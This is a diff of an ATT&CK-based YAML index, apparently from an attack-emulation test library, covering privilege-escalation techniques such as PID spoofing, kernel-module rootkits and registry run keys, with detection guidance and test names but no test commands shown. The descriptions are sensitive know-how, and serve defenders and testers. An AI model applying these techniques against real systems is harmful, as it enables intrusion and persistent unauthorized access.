+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - IaaS
-      - Azure AD
       - SaaS
-      x_mitre_version: '2.7'
+      - Identity Provider
+      x_mitre_version: '2.8'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
+      - 'Active Directory: Active Directory Object Creation'
+      - 'Active Directory: Active Directory Object Modification'
       type: attack-pattern
       id: attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd
       created: '2020-01-19T16:10:15.008Z'
@@ -41703,10 +42013,18 @@ privilege-escalation:
         description: Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service
           Principals. Retrieved January 19, 2020.
         url: https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/
+      - source_name: Lacework AI Resource Hijacking 2024
+        description: Detecting AI resource-hijacking with Composite Alerts. (2024,
+          June 6). Lacework Labs. Retrieved July 1, 2024.
+        url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
       - source_name: GCP SSH Key Add
         description: Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved
           October 1, 2020.
         url: https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add
+      - source_name: Permiso Scattered Spider 2023
+        description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+          SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+        url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
       - source_name: Blue Cloud of Death Video
         description: 'Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming
           Azure. Retrieved November 21, 2019.'
@@ -41715,10 +42033,20 @@ privilege-escalation:
         description: 'Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming
           Azure. Retrieved October 23, 2019.'
         url: https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
+      - source_name: Microsoft Entra ID App Passwords
+        description: Microsoft. (2023, October 23). Enforce Microsoft Entra multifactor
+          authentication with legacy applications using app passwords. Retrieved May
+          28, 2024.
+        url: https://learn.microsoft.com/en-us/entra/identity/authentication/howto-mfa-app-passwords
       - source_name: Microsoft SolarWinds Customer Guidance
         description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
           Cyber Attacks. Retrieved December 17, 2020.
         url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
+      - source_name: Mandiant APT42 Operations 2024
+        description: 'Ofir Rozmann, Asli Koksal, Adrian Hernandez, Sarah Bock, and
+          Jonathan Leathery. (2024, May 1). Uncharmed: Untangling Iran''s APT42 Operations.
+          Retrieved May 28, 2024.'
+        url: https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations
       - source_name: Expel Behind the Scenes
         description: 'S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020,
           July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved
@@ -41735,9 +42063,6 @@ privilege-escalation:
         url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.001
     atomic_tests:
     - name: Azure AD Application Hijacking - Service Principal
@@ -41977,7 +42302,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.003:
     technique:
@@ -42066,7 +42390,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.003
     atomic_tests:
     - name: Persistence via WMI Event Subscription - CommandLineEventConsumer
@@ -42257,7 +42580,7 @@ privilege-escalation:
         Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be <code>explorer.exe</code> rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
 
         Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as <code>lsass.exe</code>), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-03T02:15:42.360Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Access Token Manipulation: Parent PID Spoofing'
       x_mitre_detection: |-
@@ -42282,7 +42605,6 @@ privilege-escalation:
       - Host Forensic Analysis
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.004
     atomic_tests:
     - name: Parent PID Spoofing using PowerShell
@@ -42476,7 +42798,7 @@ privilege-escalation:
         name: powershell
   T1546.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:27:11.065Z'
       name: 'Event Triggered Execution: Change Default File Association'
       description: "Adversaries may establish persistence by executing malicious content
         triggered by a file type association. When a file is opened, the default program
@@ -42502,7 +42824,6 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: persistence
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Stefan Kanthak
@@ -42516,7 +42837,6 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -42543,8 +42863,8 @@ privilege-escalation:
         url: https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs
       - source_name: Microsoft File Handlers
         description: Microsoft. (n.d.). Specifying File Handlers for File Name Extensions.
-          Retrieved November 13, 2014.
-        url: http://msdn.microsoft.com/en-us/library/bb166549.aspx
+          Retrieved September 12, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2015/extensibility/specifying-file-handlers-for-file-name-extensions?view=vs-2015
       - source_name: Microsoft Assoc Oct 2017
         description: Plett, C. et al.. (2017, October 15). assoc. Retrieved August
           7, 2018.
@@ -42555,7 +42875,8 @@ privilege-escalation:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1546.001
     atomic_tests:
     - name: Change Default File Association
@@ -42655,7 +42976,7 @@ privilege-escalation:
         resources, and possibly elevated privileges. Execution via VDSO hijacking
         may also evade detection from security products since the execution is masked
         under a legitimate process.  "
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-07T17:09:09.048Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: VDSO Hijacking
       x_mitre_detection: "Monitor for malicious usage of system calls, such as ptrace
@@ -42682,7 +43003,6 @@ privilege-escalation:
       - Application control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.014:
     technique:
@@ -42722,7 +43042,7 @@ privilege-escalation:
         The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path <code>/private/var/db/emondClients</code>, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at<code>/System/Library/LaunchDaemons/com.apple.emond.plist</code>.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
 
         Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T00:16:01.732Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Event Triggered Execution: Emond'
       x_mitre_detection: Monitor emond rules creation by checking for files created
@@ -42742,7 +43062,6 @@ privilege-escalation:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.014
     atomic_tests:
     - name: Persistance with Event Monitor - emond
@@ -42769,7 +43088,7 @@ privilege-escalation:
         elevation_required: true
   T1574.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:37.026Z'
       name: Services File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -42823,11 +43142,10 @@ privilege-escalation:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1547.001:
     technique:
-      modified: '2023-10-16T09:08:22.319Z'
+      modified: '2024-09-12T15:27:58.051Z'
       name: 'Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'
       description: |-
         Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -42914,9 +43232,9 @@ privilege-escalation:
           in the Registry. Retrieved August 3, 2020.
         url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
       - source_name: Microsoft Run Key
-        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa376977
+        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
       - source_name: Oddvar Moe RunOnceEx Mar 2018
         description: Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden
           from Autoruns.exe. Retrieved June 29, 2018.
@@ -42929,7 +43247,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.001
     atomic_tests:
     - name: Reg Key Run
@@ -43363,7 +43680,7 @@ privilege-escalation:
         elevation_required: true
   T1098:
     technique:
-      modified: '2024-01-16T22:24:38.234Z'
+      modified: '2024-10-15T15:35:57.382Z'
       name: Account Manipulation
       description: "Adversaries may manipulate accounts to maintain and/or elevate
         access to victim systems. Account manipulation may consist of any action that
@@ -43399,16 +43716,15 @@ privilege-escalation:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - SaaS
       - Network
       - Containers
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
@@ -43449,7 +43765,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098
     atomic_tests:
     - name: Admin Account Manipulate
@@ -44442,138 +44757,137 @@ privilege-escalation:
           terraform apply -auto-approve
   T1547.006:
     technique:
-      x_mitre_platforms:
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-09-12T17:30:54.170Z'
+      name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
+      description: |-
+        Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming) 
+
+        When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
+
+        Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through <code>kextload</code> and <code>kextunload</code> commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
+
+        Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
+
+        Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
       x_mitre_contributors:
       - Wayne Silva, F-Secure Countercept
       - Anastasios Pingios
       - Jeremy Galloway
       - Red Canary
       - Eric Kaiser @ideologysec
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_deprecated: false
+      x_mitre_detection: |
+        Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: <code>modprobe</code>, <code>insmod</code>, <code>lsmod</code>, <code>rmmod</code>, or <code>modinfo</code> (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into <code>/lib/modules</code> and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
+
+        Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: <code>apt-get install linux-headers-$(uname -r)</code> On RHEL and CentOS based systems this can be accomplished by running: <code>yum install kernel-devel-$(uname -r)</code>
+
+        On macOS, monitor for execution of <code>kextload</code> commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the <code>kext_policy</code> table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, <code>/var/db/SystemPolicyConfiguration/KextPolicy</code>.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      - Linux
+      x_mitre_version: '1.3'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'File: File Creation'
+      - 'File: File Modification'
+      - 'Kernel: Kernel Module Load'
+      - 'Process: Process Creation'
+      x_mitre_permissions_required:
+      - root
       type: attack-pattern
       id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6
       created: '2020-01-24T17:42:23.339Z'
-      x_mitre_version: '1.3'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1547.006
         url: https://attack.mitre.org/techniques/T1547/006
+        external_id: T1547.006
       - source_name: Apple Developer Configuration Profile
-        url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
         description: Apple. (2019, May 3). Configuration Profile Reference. Retrieved
           September 23, 2021.
+        url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
       - source_name: Apple Kernel Extension Deprecation
-        url: https://developer.apple.com/support/kernel-extensions/
         description: Apple. (n.d.). Deprecated Kernel Extensions and System Extension
           Alternatives. Retrieved November 4, 2020.
+        url: https://developer.apple.com/support/kernel-extensions/
       - source_name: System and kernel extensions in macOS
-        url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
         description: Apple. (n.d.). System and kernel extensions in macOS. Retrieved
           March 31, 2022.
+        url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
       - source_name: GitHub Reptile
-        url: https://github.com/f0rb1dd3n/Reptile
         description: Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved
           April 9, 2018.
+        url: https://github.com/f0rb1dd3n/Reptile
       - source_name: Volatility Phalanx2
-        url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
         description: 'Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility
           to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.'
+        url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
       - source_name: iDefense Rootkit Overview
-        url: http://www.megasecurity.org/papers/Rootkits.pdf
         description: Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved
-          April 6, 2018.
+          September 12, 2024.
+        url: https://www.megasecurity.org/papers/Rootkits.pdf
       - source_name: Linux Loadable Kernel Module Insert and Remove LKMs
-        url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
         description: Henderson, B. (2006, September 24). How To Insert And Remove
           LKMs. Retrieved April 9, 2018.
+        url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
       - source_name: CrowdStrike Linux Rootkit
-        url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
         description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit.
           Retrieved December 21, 2017.
+        url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
       - source_name: GitHub Diamorphine
-        url: https://github.com/m0nad/Diamorphine
         description: Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux
           Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.
+        url: https://github.com/m0nad/Diamorphine
       - source_name: Securelist Ventir
-        url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
         description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble
           your MacOS spy. Retrieved April 6, 2018.'
+        url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
       - source_name: User Approved Kernel Extension Pike’s
-        url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
         description: Pikeralpha. (2017, August 29). User Approved Kernel Extension
           Loading…. Retrieved September 23, 2021.
+        url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
       - source_name: Linux Kernel Module Programming Guide
-        url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
         description: Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs.
           Retrieved April 6, 2018.
+        url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
       - source_name: Linux Kernel Programming
-        url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
         description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel
           Module Programming Guide. Retrieved April 6, 2018.
+        url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
       - source_name: Trend Micro Skidmap
-        url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
         description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux
           Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload.
           Retrieved June 4, 2020.
+        url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
       - source_name: Purves Kextpocalypse 2
-        url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
         description: Richard Purves. (2017, November 9). MDM and the Kextpocalypse
           . Retrieved September 23, 2021.
+        url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
       - source_name: RSAC 2015 San Francisco Patrick Wardle
-        url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
         description: Wardle, P. (2015, April). Malware Persistence on OS X Yosemite.
           Retrieved April 6, 2018.
+        url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
       - source_name: Synack Secure Kernel Extension Broken
-        url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
         description: Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel
           Extension Loading’ is Broken. Retrieved April 6, 2018.
+        url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
       - source_name: Wikipedia Loadable Kernel Module
-        url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
         description: Wikipedia. (2018, March 17). Loadable kernel module. Retrieved
           April 9, 2018.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming) 
-
-        When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
-
-        Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through <code>kextload</code> and <code>kextunload</code> commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
-
-        Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
-
-        Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
-      x_mitre_detection: |
-        Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: <code>modprobe</code>, <code>insmod</code>, <code>lsmod</code>, <code>rmmod</code>, or <code>modinfo</code> (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into <code>/lib/modules</code> and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
-
-        Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: <code>apt-get install linux-headers-$(uname -r)</code> On RHEL and CentOS based systems this can be accomplished by running: <code>yum install kernel-devel-$(uname -r)</code>
-
-        On macOS, monitor for execution of <code>kextload</code> commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the <code>kext_policy</code> table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, <code>/var/db/SystemPolicyConfiguration/KextPolicy</code>.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: persistence
-      - kill_chain_name: mitre-attack
-        phase_name: privilege-escalation
-      x_mitre_is_subtechnique: true
-      x_mitre_data_sources:
-      - 'Command: Command Execution'
-      - 'File: File Creation'
-      - 'File: File Modification'
-      - 'Kernel: Kernel Module Load'
-      - 'Process: Process Creation'
-      x_mitre_permissions_required:
-      - root
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.006
     atomic_tests:
     - name: Linux - Load Kernel Module via insmod
@@ -44756,7 +45070,7 @@ privilege-escalation:
         url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
         description: Microsoft. (2021, November 23). NtQueryInformationProcess function
           (winternl.h). Retrieved February 4, 2022.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-22T15:47:33.915Z'
       name: KernelCallbackTable
       description: |-
         Adversaries may abuse the <code>KernelCallbackTable</code> of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The <code>KernelCallbackTable</code> can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once <code>user32.dll</code> is loaded.(Citation: Windows Process Injection KernelCallbackTable)
@@ -44782,12 +45096,10 @@ privilege-escalation:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1053.006:
     technique:
-      modified: '2023-09-08T11:56:26.862Z'
+      modified: '2024-10-15T16:42:51.536Z'
       name: 'Scheduled Task/Job: Systemd Timers'
       description: |-
